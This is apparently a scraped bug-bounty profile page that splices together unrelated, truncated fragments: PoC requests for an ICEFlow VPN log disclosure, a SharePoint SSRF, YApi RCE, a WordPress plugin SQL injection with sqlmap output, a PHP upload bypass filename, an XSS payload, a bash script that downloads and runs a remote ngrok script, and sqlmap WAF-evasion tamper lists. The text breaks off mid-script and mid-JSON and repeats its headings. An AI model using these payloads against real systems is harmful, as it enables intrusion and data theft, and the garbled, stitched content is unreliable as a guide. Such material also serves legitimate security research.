PikPikcU pikpikcu

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

ICEFlow VPN information disclosure vulnerability

Fofa

title="ICEFLOW VPN Router"

POC:

http://REDACTED/log/system.log
http://REDACTED/log/vpn.log
http://REDACTED/log/access.log

Microsoft SharePoint Server - GetXmlDataFromDataSource Server-Side Request Forgery Information Disclosure Vulnerability

POC:

POST /_vti_bin/webpartpages.asmx HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
SOAPAction: "http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource"
Host: localhost

POC YApi RCE:

Reference:

YMFE/yapi#2229

POC

Requests:

POST /api/user/reg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

WordPress Plugin - Google Review Slider 6.1 SQL Injection

poc:

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

sqlmap result:

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip

----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.&lt;&gt;php"

TurboCRM Allow XSS (cross site scripting)

Dork

Payloads

"><script>alert(/XSS/)</script>

	#!/bin/bash

	wget -O ng.sh https://github.com/kmille36/Docker-Ubuntu-Desktop-NoMachine/raw/main/ngrok.sh > /dev/null 2>&1
	chmod +x ng.sh
	./ng.sh

	function goto
	{
	label=$1
	cd

	[
	{
	"program_name": "(ISC)²",
	"policy_url": "https://bugcrowd.com/isc2",
	"submission_url": "https://bugcrowd.com/isc2/report",
	"launch_date": "",
	"bug_bounty": false,
	"swag": false,
	"hall_of_fame": true,
	"safe_harbor": "partial"

	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# Microsoft access
	```

PikPikcU pikpikcu

Description

Steps

ICEFlow VPN information disclosure vulnerability

Fofa

POC:

POC YApi RCE:

Reference:

POC

WordPress Plugin - Google Review Slider 6.1 SQL Injection

TurboCRM Allow XSS (cross site scripting)

Dork

Payloads

Step To Reproduction